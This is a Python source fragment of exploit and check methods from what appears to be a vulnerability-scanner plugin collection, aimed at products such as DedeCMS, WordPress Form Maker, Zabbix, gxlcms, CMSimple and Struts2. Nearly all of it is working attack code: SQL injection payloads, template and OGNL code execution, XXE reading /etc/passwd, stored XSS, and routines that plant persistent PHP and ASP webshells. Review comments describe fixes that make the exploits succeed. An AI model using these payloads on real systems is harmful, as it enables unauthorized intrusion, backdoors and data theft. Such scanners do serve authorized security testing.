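            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))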
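def verify(self):
    """Time-based SQL injection check for the Form Maker plugin (``db_table_struct``).

    Sends a baseline ``name`` of ``wp_users WHERE 42=42 AND SLEEP(0)--;`` and
    then the same with ``SLEEP(timeout)``; reports when the second request
    takes at least ``timeout`` seconds longer.  Only reports; exceptions are
    logged.

    Fix over the original: BOTH requests injected ``SLEEP(5)``, so the
    measured difference was always ~0 and the check could never fire; the
    comparison also expected the sleeping request second, which is now the
    case.  Requests carry an HTTP timeout larger than the SQL sleep.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        url = self.target + '/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct'
        delay = 5
        http_timeout = delay * 4
        baseline = {'name': "wp_users WHERE 42=42 AND SLEEP(0)--;"}
        injected = {'name': "wp_users WHERE 42=42 AND SLEEP({})--;".format(delay)}
        t0 = time.time()
        requests.post(url, data=baseline, timeout=http_timeout)
        t1 = time.time()
        requests.post(url, data=injected, timeout=http_timeout)
        t2 = time.time()
        if (t2 - t1) - (t1 - t0) >= delay:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常:{}'.format(e))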
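def exploit(self):
    """DedeCMS ``plus/download.php`` SQL injection exploit: plant ``plus/x.php``.

    ``arrs1``/``arrs2`` are the target's own "one char code per array
    element" encoding; decoded they are the table-prefix variable
    (``cfg_dbprefix``) and an UPDATE fragment that stores a ``{dede:php}`` tag
    in ``mytag`` id 1.  Requesting ``mytag_js.php?aid=1`` then evaluates the
    tag, which writes ``x.php`` containing ``eval($_POST[m])`` — a persistent
    backdoor (password ``m``) the report asks the operator to remove.  Only
    reports; exceptions are logged.

    Fixes over the original: the two arrays are generated from the readable
    strings instead of a 1 500-character literal; requests have a timeout.

    NOTE(review): ``x.php`` is only checked for HTTP 200; a site that answers
    200 for unknown paths (soft 404) will produce a false "webshell uploaded"
    report.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        timeout = 15
        prefix_var = 'cfg_dbprefix'
        sql_fragment = ("mytag` SET `normbody` = '{dede:php}file_put_contents(''x.php'',"
                        "''<?php eval($_POST[m]);?>'');{/dede:php}' WHERE `aid` =1 #")
        arrs = ['arrs1[]={}'.format(ord(ch)) for ch in prefix_var]
        arrs += ['arrs2[]={}'.format(ord(ch)) for ch in sql_fragment]
        inject_url = self.target + '/plus/download.php?open=1&' + '&'.join(arrs)
        requests.post(inject_url, timeout=timeout)
        # Render the poisoned tag; this is what actually writes plus/x.php.
        requests.get(self.target + '/plus/mytag_js.php?aid=1', timeout=timeout)
        shell_url = self.target + '/plus/x.php'
        r = requests.get(shell_url, timeout=timeout)
        if r.status_code == 200:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞,,已上传webshell地址:{url}密码为m,请及时删除。'.format(
                    target=self.target, name=self.vuln.name, url=shell_url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))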
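def exploit(self):
    """Template injection exploit for ``index.php?m=vod-search`` (``wd``).

    Sends ``{if-A:assert($_POST[c])}{endif-A}`` as the search term, then
    calls the same URL with ``c=phpinfo()`` and looks for phpinfo output.
    Nothing is written to disk; the "webshell" is the injectable URL itself.
    Only reports; exceptions are logged.

    Fixes over the original: the success marker was misspelled
    (``'PHP Verison'``) so the exploit could never report; raw-string bodies
    now carry a form Content-Type (PHP does not populate ``$_POST`` without
    it) and a timeout.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        timeout = 15
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        template_payload = '{if-A:assert($_POST[c])}{endif-A}'
        url = self.target + "/index.php?m=vod-search"
        requests.post(url, data="wd=" + template_payload, headers=headers, timeout=timeout)
        verify_url = url + '&wd=' + template_payload
        r = requests.post(verify_url, data='c=phpinfo()', headers=headers, timeout=timeout)
        if 'PHP Version' in r.text and 'System' in r.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.format(
                    target=self.target, name=self.vuln.name, url=verify_url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))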
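def verify(self):
    """Zabbix API check: ``script.update`` lets an authenticated user change a
    global script's command (the RCE primitive).

    Logs in through ``api_jsonrpc.php``, asks the operator for a command,
    updates script id 1 with it and reports if the API accepts the update.
    The modified script is NOT restored.  The original also built a
    ``script.execute`` request but never sent it; that dead code is gone, so
    nothing is run on a host here.  Only reports; exceptions are logged.

    Fixes over the original: the command was read with ``eval(input())``,
    which executes whatever is typed as Python before it is sent — it is now
    a plain ``input()``; a finding was reported unconditionally after login,
    even on a JSON-RPC ``error`` — it now requires ``result`` from both the
    login and the update; a bare ``except: return`` was removed; requests
    have a timeout.

    NOTE(review): ``login``/``password`` are redacted placeholders and
    ``hostid`` is unused without the execute step.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        url = self.target + '/api_jsonrpc.php'
        timeout = 15
        login = '******'  # Zabbix login
        password = '******'  # Zabbix password
        headers = {'content-type': 'application/json'}

        def rpc(method, params, auth):
            """One JSON-RPC 2.0 call; returns the decoded response object."""
            body = {"jsonrpc": "2.0", "method": method, "params": params, "auth": auth, "id": 0}
            return requests.post(url, data=json.dumps(body), headers=headers, timeout=timeout).json()

        session = rpc("user.login", {'user': login, 'password': password}, None)
        if 'result' not in session:
            # JSON-RPC error (bad credentials, disabled account, ...): nothing to report.
            self.output.info('执行异常:{}'.format(session.get('error')))
            return
        cmd = input('\033[41m[zabbix_cmd]>>: \033[0m ')
        updated = rpc("script.update", {"scriptid": "1", "command": cmd}, session['result'])
        if 'result' in updated:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常:{}'.format(e))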
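def verify(self):
    """gxlcms: unauthenticated phpinfo leaks the document root, then
    ``Admin-Data-upsql`` writes a PHP file there via ``INTO OUTFILE``.

    Reads ``DOCUMENT_ROOT`` from ``index.php?s=Admin-Index-phpinfo``, writes
    ``<docroot>/gxlcms/cscan.php`` (phpinfo + ``md5("c")``) and fetches it.
    This WRITES A FILE on the target that is not cleaned up.  Only reports;
    exceptions are logged.

    Fixes over the original: the ``DOCUMENT_ROOT`` regex used a greedy
    ``(.+)`` that could swallow the rest of the row; when the root could not
    be read the SQL was still sent with an empty path (writing to
    ``/gxlcms/cscan.php`` on the filesystem root) — it now stops; the
    raw-string body carries a form Content-Type; requests have a timeout.

    NOTE(review): ``hash=ab2af393...`` is a captured form token; a target
    that validates it will reject the write.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        timeout = 15
        # Step 1: document root from the exposed phpinfo page.
        info = requests.get(self.target + '/gxlcms/index.php?s=Admin-Index-phpinfo', timeout=timeout)
        match = re.search(r'DOCUMENT_ROOT\'\]</td><td class=\"v\">(.+?)</td>', info.text)
        if not match:
            self.output.info('执行异常{}'.format('DOCUMENT_ROOT not found in phpinfo output'))
            return
        document_root = match.group(1)
        self.output.info('获取到网站绝对路径{}'.format(document_root))
        # Step 2: write the probe file through the SQL console.
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        data = ("sql=select '<?php phpinfo();echo md5(c)?>' INTO OUTFILE '{}/gxlcms/cscan.php';"
                "&submit=%E6%8F%90+%E4%BA%A4&hash=ab2af3933aa472eba3a25e8d69852e55").format(document_root)
        requests.post(self.target + '/gxlcms/index.php?s=Admin-Data-upsql', data=data, headers=headers, timeout=timeout)
        # Step 3: fetch it.
        verify_url = self.target + '/gxlcms/cscan.php'
        r = requests.get(verify_url, timeout=timeout)
        if '4a8a08f09d37b73795649038408b5f33' in r.text:  # md5("c")
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                    target=self.target, name=self.vuln.name, url=verify_url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))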
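def exploit(self):
    """Unrestricted upload through ``Comm/UploadFile/webUpload.aspx``.

    Uploads ``9d37b73795649038.cer`` containing ``<%eval request("c")%>``
    (an ASP backdoor, password ``c``) with ``FilePath=/../web/`` so it lands
    in the web root, then reports the shell URL.  Only reports; exceptions
    are logged.

    Fixes over the original: the multipart body was a hand-written string
    sent without a ``multipart/form-data`` Content-Type or boundary header
    and with indentation inside the parts, so the server could not parse it —
    ``requests`` now builds the multipart body from ``files``/``data``; a
    finding is only reported after the uploaded file is actually reachable
    (the original reported on any 200 from the upload handler); requests have
    a timeout.

    NOTE(review): ``verify_url`` assumes ``self.target`` ends with ``/`` and
    that ``/../web/`` resolves to the site root — confirm per target.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        timeout = 15
        shell_name = '9d37b73795649038.cer'
        upload_url = arg + "/Comm/UploadFile/webUpload.aspx?AttId=" + shell_name + "&FilePath=/../web/"
        fields = {'__VIEWSTATE': '/wEPDwUJLTkxNTA4NDgxZGT4FQnTj63sW6bItFI88C2Fes3jcRPos/LRQn4yOHqiRw=='}
        files = {'fa': (shell_name, '<%eval request("c")%>', 'application/x-x509-ca-cert')}
        upload = requests.post(upload_url, data=fields, files=files, timeout=timeout)
        verify_url = arg + shell_name
        if upload.status_code == 200 and requests.get(verify_url, timeout=timeout).status_code == 200:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞;\n已上传webshell地址:{url}密码为c,请及时删除。'.format(
                    target=self.target, name=self.vuln.name, url=verify_url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))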
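def verify(self):
    """Unrestricted JSP upload check for ``lwUpLoad_action.jsp``.

    Uploads ``v.jsp`` which prints its own real path and ``payload=true``,
    then fetches ``/lwUpLoadTemp/null.jsp`` and looks for the marker.  The
    uploaded JSP is not removed.  Only reports; exceptions are logged.

    Fix over the original: requests carry a timeout.

    NOTE(review): the file is uploaded as ``v.jsp`` but fetched as
    ``null.jsp`` — presumably the handler renames it; confirm on the target.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        timeout = 15
        base = '{target}'.format(target=self.target)
        verify_url = base + "/lwUpLoadTemp/null.jsp"
        upload_url = base + "/lwUpLoad_action.jsp"
        probe_jsp = '''<%@ page import="java.util.*,java.io.*" %> <%@ page import="java.io.*"%> <% String path=application.getRealPath(request.getRequestURI()); File d=new File(path); out.println(path); %> <% out.println("payload=true");%> '''
        files = {'theFile': ('v.jsp', probe_jsp, 'text/plain')}
        requests.post(upload_url, files=files, timeout=timeout)
        content = requests.get(verify_url, timeout=timeout).text
        if 'payload=true' in content:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))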
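def verify(self):
    """XXE check for ``/api/login``: an external entity is resolved and echoed.

    Posts a login document whose DTD declares ``xxe`` as
    ``file:///etc/passwd`` and references it in ``<Username>``; reports when
    a ``root:x:0:0:...`` passwd line appears in a 200 response.  Only
    reports; exceptions are logged.

    Fixes over the original: the document carried two XML declarations,
    which any conforming parser rejects; the entity was declared but never
    referenced, so nothing could be read; the regex describes the
    ``/etc/passwd`` format but the request asked for ``/etc/shadow`` (which
    would not match it and is needlessly sensitive); ``re.match`` only
    matched at the very start of the body, ``re.search`` finds the line
    anywhere; the nested duplicate try/except was removed.

    NOTE(review): which element is echoed back depends on the target; the
    original put credentials in both ``Username`` and ``Password``, the
    entity is placed in ``Username`` here.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        filename = '/etc/passwd'
        payload = ('<?xml version="1.0" encoding="ISO-8859-1"?>'
                   '<!DOCTYPE foo ['
                   '<!ELEMENT foo ANY >'
                   '<!ENTITY xxe SYSTEM "file://{file}" >]>'
                   '<Request>'
                   '<Username>&xxe;</Username>'
                   '<Password>root</Password>'
                   '</Request>').format(file=filename)
        expurl = '{target}'.format(target=self.target) + '/api/login'
        response = requests.post(expurl, data=payload, timeout=50)
        if response.status_code == 200 and re.search(r'root:.+?:0:0:.+?:.+?:.+?', response.text):
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))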
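def verify(self):
    """CMSimple ``editusertag.php`` code execution check (``code`` parameter).

    Saves a user tag whose code is ``passthru('dir');`` with ``run=1`` and
    reports when the JSON success envelope comes back.  Executes a command on
    the target and stores the tag.  Requires an admin session from the
    ``cookies`` option.  Only reports; exceptions are logged.

    Fixes over the original: ``requests.post(..., header=...)`` is not a
    valid keyword (``headers=``) and raised ``TypeError`` on every run, so
    the check never executed; a hard-coded ``Content-Length: 115`` that did
    not match the body and a fixed ``Connection`` header were dropped
    (``requests`` sets both); requests have a timeout.

    NOTE(review): ``_sk_`` is a captured session key; a target that
    validates it will reject the request.
    """
    self.target = self.target.rstrip('/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(target=self.target, vuln=self.vuln))
        timeout = 15
        vul_url = self.target + "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
        vul_headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Cookie": self.get_option("cookies"),
            "Pragma": "no-cache",
            "Cache-Control": "no-cache",
        }
        data = '''_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1'''
        response = requests.post(vul_url, data=data, headers=vul_headers, timeout=timeout)
        if '''{"response":"Success","details":"}''' in response.text:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常:{}'.format(e))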
def verify(self):
    """Probe ``/my.php`` for error-based SQL injection via the
    ``buddylist[]`` array key.

    The injected subquery forces a duplicate-key error whose message
    carries ``md5(c)``; the response is scanned for the md5 of ``"c"``
    (``4a8a08f0...``). Logs through ``self.output`` and calls
    ``self.output.report`` on a hit; exceptions are logged, never raised.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # The request goes out with an empty cookie jar, i.e. unauthenticated.
        # NOTE(review): /my.php is a member page, so without a session the
        # reply may just be a login redirect -- confirm on a live target.
        session_cookies = {}
        # NOTE(review): an unquoted `c` is a column reference in MySQL, not
        # the string 'c'; unless the queried table has such a column the
        # server raises "Unknown column" instead and the marker never shows.
        injection = "/my.php?item=buddylist[' and(select 1 from(select count(*),concat((select(select concat(0x7c,username,0x7c,md5(c),0x7c) from cdb_members limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23]=1"
        # NOTE(review): formhash is normally a per-session CSRF token; this
        # constant was captured from some other session and may be rejected.
        form_body = "formhash=698a7245&buddysubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
        marker = '4a8a08f09d37b73795649038408b5f33'
        reply = requests.post(self.target + injection,
                              cookies=session_cookies, data=form_body)
        if marker in reply.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
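def verify(self):
    """Check the guestbook page ``/guest/index.html`` for reflected XSS.

    Posts a guestbook entry whose ``title`` is ``<svg/onload=alert('cscan')>``
    and reports when that exact markup comes back unescaped in the
    response body. Logs through ``self.output``; exceptions are logged,
    never raised.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        self.output.info('开始对网站进行跨站脚本漏洞检查...')
        payload = '/guest/index.html'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
            'Cookie': '%s' % self.get_option('cookies')
        }
        # URL-encoded form body; `title` decodes to the marker below.
        data = "title=%3Csvg%2Fonload%3Dalert%28%27cscan%27%29%3E&name=test&email=test%40test.t&content=test"
        # The marker must be the decoded form of what was actually sent.
        # The original looked for "<script>alert('cscan')</script>", which
        # is never submitted, so the check could not succeed.
        marker = "<svg/onload=alert('cscan')>"
        url = self.target.rstrip('/') + payload
        self.output.info('对网站/guest/index.html页面进行跨站请求验证...')
        r = requests.post(url, headers=headers, data=data)
        if marker in r.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))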
def verify(self):
    """Check the admin article editor for stored XSS.

    Step one inserts an article whose title is ``<img src=x onerror=alert(1)>``
    through the admin insert action; step two fetches the article list and
    reports when the title is rendered unescaped inside a ``<td>``.
    Both requests carry the cookie from the ``cookie`` option. Logs through
    ``self.output``; exceptions are logged, never raised.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        base = self.target
        # NOTE(review): this class reads the option as 'cookie' whereas the
        # sibling checks use 'cookies' -- confirm which key the option
        # registry actually defines for this check.
        request_headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            'Cookie': self.get_option('cookie')
        }
        self.output.info('正在构造xss payload')
        insert_path = "/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent"
        form_body = '''tid=&title=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&keyword=cscanpoc&ispush=0&iscommend=1&isslides=0&islock=0&summary=cscanpoc&content=%09%09%09%09%09cscanpoc'''
        # The insert response itself is not inspected; only the listing is.
        requests.post(base + insert_path, headers=request_headers, data=form_body)
        self.output.info('验证xss是否成功触发')
        list_path = "/index.php?s=/admin/articlem/index.html&_=1532271572256"
        listing = requests.get(base + list_path, headers=request_headers)
        rendered = '<td><img src=x onerror=alert(1)></td>'
        if listing.status_code == 200 and rendered in listing.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """Probe ``/user.action`` for Struts2 OGNL expression injection.

    The ``age`` form field carries an OGNL expression that re-enables
    static method access, runs ``echo <marker>`` on the server and
    returns the command output; the marker echoed in the response body is
    the only evidence accepted. The command is a benign echo, but it is
    still remote code execution on the target. Logs through
    ``self.output``; exceptions are logged, never raised.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        marker = '92933839f1efb2da9a4799753ee8d79c'
        ognl = """'+ (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo 92933839f1efb2da9a4799753ee8d79c').getInputStream())) + '"""
        form = {
            'username': 'cscan',
            'email': 'cscan',
            'age': ognl,
        }
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        reply = requests.post(self.target + '/user.action', data=form)
        if marker in reply.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
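def verify(self):
    """Probe ``/upload/member.php?action=cz`` for error-based SQL injection
    in the ``cckkey`` parameter.

    The payload breaks out of the string and calls ``updatexml`` with an
    invalid XPath built from ``md5(c)``; the resulting error message is
    scanned for the md5 of ``"c"`` (``4a8a08f0...``). Logs through
    ``self.output`` and calls ``self.output.report`` on a hit; exceptions
    are logged, never raised.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Empty jar: the probe is sent unauthenticated.
        cookies = {}
        # The path depends on the install directory; adjust if /upload is
        # not where the application lives.
        payload = '/upload/member.php?action=cz'
        # NOTE(review): an unquoted `c` is a column reference in MySQL, not
        # the string 'c'; if no such column exists the server raises
        # "Unknown column" and the marker is never produced.
        data = "cckkey=aaaa0' or updatexml(1,concat(0x7e,(md5(c))),0) or '"
        url = self.target.rstrip('/') + payload
        # The jar goes in `cookies=`; the original passed it as `headers=`,
        # which silently sent it as (empty) header fields instead.
        r = requests.post(url, cookies=cookies, data=data)
        if '4a8a08f09d37b73795649038408b5f33' in r.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))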
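def verify(self):
    """Probe ``poll_update.php`` for error-based SQL injection in
    ``gb_poll``.

    Fetches the target page, collects every ``po_id`` hidden field, and
    for each one posts a duplicate-key subquery that leaks ``md5(123)``.
    The response is scanned for the md5 of ``"123"``
    (``202cb962...``); the first hit is reported and the loop stops.
    Logs through ``self.output``; exceptions are logged, never raised.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        url = self.target
        req = requests.get(url)
        if req.status_code != 200:
            return
        po_ids = re.findall(r'name="po_id" value="(\d+)"', req.text)
        verify_url = url.rstrip('/') + '/poll_update.php'
        marker = '202cb962ac59075b964b07152d234b70'  # md5('123')
        for po_id in po_ids:
            # Implicit string concatenation: each piece must end with the
            # space the SQL needs. The original dropped them, producing
            # "selectcount(*)" and "group byx", which MySQL rejects as a
            # syntax error, so the marker could never be returned.
            post = (
                "_SERVER[REMOTE_ADDR]=86117&po_id=%s&gb_poll=1=1 and(select 1 from(select "
                "count(*),concat((select md5(123)),floor(rand(0)*2))x from information_schema.tables group by "
                "x)a)") % po_id
            reqp = requests.post(verify_url, data=post)
            if reqp.status_code == 200 and marker in reqp.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
                # One report per target is enough; further ids would only
                # duplicate the finding.
                break
    except Exception as e:
        self.output.info('执行异常{}'.format(e))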